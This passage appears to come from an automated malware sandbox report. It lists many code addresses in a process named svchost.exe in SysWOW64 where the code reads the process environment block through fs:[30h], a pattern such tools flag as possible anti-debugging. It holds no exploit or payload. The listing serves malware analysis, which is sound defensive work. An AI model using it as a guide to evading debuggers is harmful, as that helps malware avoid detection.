                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
